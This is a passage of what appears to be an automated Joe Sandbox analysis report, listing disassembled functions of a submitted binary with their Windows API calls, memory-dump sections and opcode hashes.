                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecutionStateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2211380416-0
                                                                                                    • Opcode ID: 8518f67b6cac38ab193bf6543d8ba1c612ce0a65d4e6a1005897f34a6cc343b0
                                                                                                    • Instruction ID: e8245a592020f32bbb22896583922c61b2e0e2e06118f4993b455aeebbdc1dd4
                                                                                                    • Opcode Fuzzy Hash: 8518f67b6cac38ab193bf6543d8ba1c612ce0a65d4e6a1005897f34a6cc343b0
                                                                                                    • Instruction Fuzzy Hash: 0CD02B206050645EEF21733A6859BFE2A868FC7310F0C20A5F1457B5D3CE8408C7A261
                                                                                                    Function 00E1A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00E1A62C
                                                                                                      • Part of subcall function 00E1A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E1A3DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1915507550-0
                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                    • Instruction ID: eb668b2a705ddc836a807c7f157498a6bb8538760badb75bc30e42e487cc0e2c
                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                    • Instruction Fuzzy Hash: D9D0C971215209BADF526B618C12AFE7AE9EB00744F089139BC42E5291EAB1D990A662
                                                                                                    Function 00E1E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DloadProtectSection.DELAYIMP ref: 00E1E5E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DloadProtectSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2203082970-0
                                                                                                    • Opcode ID: 17ab5cebd37eed04d7a48daef3b36c18c1a0c65582451e6f5316948bd1d4858d
                                                                                                    • Instruction ID: ee0f9ec1acce499377e00142ff6e39fe75d055426ea58ad83a1004a2f0d4fe55
                                                                                                    • Opcode Fuzzy Hash: 17ab5cebd37eed04d7a48daef3b36c18c1a0c65582451e6f5316948bd1d4858d
                                                                                                    • Instruction Fuzzy Hash: FFD022B02C42408FD30BEBA9B846FCDB7E2B324788FC82081F924F1390CBA080C4D601
                                                                                                    Function 00E1DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E11B3E), ref: 00E1DD92
                                                                                                      • Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                      • Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                      • Part of subcall function 00E1B568: IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                      • Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                      • Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 897784432-0
                                                                                                    • Opcode ID: 905d9e0b35903f9f176dd350da464e38fd874e148da0513212e70dddb59c6345
                                                                                                    • Instruction ID: 4c1891e9ba1d60fd7e9bc9d9d5aa0d79c33072ec01afbf0677158888fed12fa0
                                                                                                    • Opcode Fuzzy Hash: 905d9e0b35903f9f176dd350da464e38fd874e148da0513212e70dddb59c6345
                                                                                                    • Instruction Fuzzy Hash: C4D09E71144300BED6012B52DE06F0F7AE7AB89B04F004955B394740B28AB29D61EB11
                                                                                                    Function 00E098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileType.KERNELBASE(000000FF,00E097BE), ref: 00E098C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID:
                                                                                                    • API String ID: 3081899298-0
                                                                                                    • Opcode ID: 3c6ba4e1b224281b914e7615b05aca6441d8151f71e59fbf9fb6ed72e6b06af9
                                                                                                    • Instruction ID: 79e1ec5ff1a4a810661cad48fca712d18e050d56d7d7ace3a4e65420a7a18e2f
                                                                                                    • Opcode Fuzzy Hash: 3c6ba4e1b224281b914e7615b05aca6441d8151f71e59fbf9fb6ed72e6b06af9
                                                                                                    • Instruction Fuzzy Hash: 31C0127440020585CE284E3498480957711AB533797B4E694D068951E3C332CCC7EB20
                                                                                                    Function 00E1E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: afa25b056d61dc760142f3aaceab61eecd469b0242bd6517a7d731e8d610db0a
                                                                                                    • Instruction ID: a4c87a815b901d1fb802d980d1f5ea1cf3033e0ec6d6dbb43329d6873d20729d
                                                                                                    • Opcode Fuzzy Hash: afa25b056d61dc760142f3aaceab61eecd469b0242bd6517a7d731e8d610db0a
                                                                                                    • Instruction Fuzzy Hash: 67B092F1298110AC2148A1142907CB60248C4C0B20330B12ABC14F1281D84088890533
                                                                                                    Function 00E1E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: cba995bf158e59b3b51b3e27d417d2c1a5f57f2303ac5619273b1438e573a42c
                                                                                                    • Instruction ID: 898954d349dadbd26a3693e8197138de0fa712368a59a28cffc40132d05e8ba8
                                                                                                    • Opcode Fuzzy Hash: cba995bf158e59b3b51b3e27d417d2c1a5f57f2303ac5619273b1438e573a42c
                                                                                                    • Instruction Fuzzy Hash: 61B012F129C110FC314CA1142C07CF7024CC4C0F10330B02EFC14F1281D8408E890533
                                                                                                    Function 00E1E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: eb39739c0b2165ce6d97719406fd63e72923ec65a341c04872ed16854f664d7c
                                                                                                    • Instruction ID: 46f513f8a0b9d84e365e8314d3d04e6298f722d847efdef6de83df1e307c19b6
                                                                                                    • Opcode Fuzzy Hash: eb39739c0b2165ce6d97719406fd63e72923ec65a341c04872ed16854f664d7c
                                                                                                    • Instruction Fuzzy Hash: 39B092F1298110BC214861142A07CF60248C4C0B20330B12AB914F12819840488A0533
                                                                                                    Function 00E1E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: fe320ae9bf8f439a1eac6d2499f00cf61490dddceb5470da522d416ef694b9cd
                                                                                                    • Instruction ID: cb5887004c29de5d04513888125001b4763701d6a4e54a6a2abb7965117b3bb8
                                                                                                    • Opcode Fuzzy Hash: fe320ae9bf8f439a1eac6d2499f00cf61490dddceb5470da522d416ef694b9cd
                                                                                                    • Instruction Fuzzy Hash: 1BA011F22A8222BC300C22002C0BCFB020CC8C0F20330B02EFC20B0280AC8008820833
                                                                                                    Function 00E1E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: e9f7d56abe67e56c37563b435cf347e110b710f695a2d318d4667282646bc3a6
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: e9f7d56abe67e56c37563b435cf347e110b710f695a2d318d4667282646bc3a6
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    Function 00E1E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 1ab792d9324a7ea0b1feb0ca0e80e7f7ffda205a0fddd7c9e9d4da00eefc9c27
                                                                                                    • Instruction ID: a6089b6a95a2746bee86c72bc95e0b1de7b2b98b1252e16971428dc1e9ebdd17
                                                                                                    • Opcode Fuzzy Hash: 1ab792d9324a7ea0b1feb0ca0e80e7f7ffda205a0fddd7c9e9d4da00eefc9c27
                                                                                                    • Instruction Fuzzy Hash: 83A011F22AC222BC300C22002C0BCFB020CC8C0F20330B82EFC22B0280A88008820833
                                                                                                    Function 00E1E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E3FC
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
